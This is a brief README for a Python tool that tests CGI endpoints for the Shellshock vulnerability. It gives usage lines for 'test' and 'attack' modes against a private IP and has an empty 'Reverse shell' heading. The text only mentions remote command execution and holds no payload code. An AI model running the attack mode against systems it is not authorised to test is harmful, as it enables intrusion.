This is a Python script that tests for http shellshocker vulnerability. If it exists, it allows you to run commands remotely.
Simple Usage:
python3 effectiveShellShocker.py -h
python3 effectiveShellShocker.py test http://172.16.80.22 /cgi-bin /calendar.cgi
python3 effectiveShellShocker.py attack http://172.16.80.22 /cgi-bin /calendar.cgi
Reverse shell:
Thank you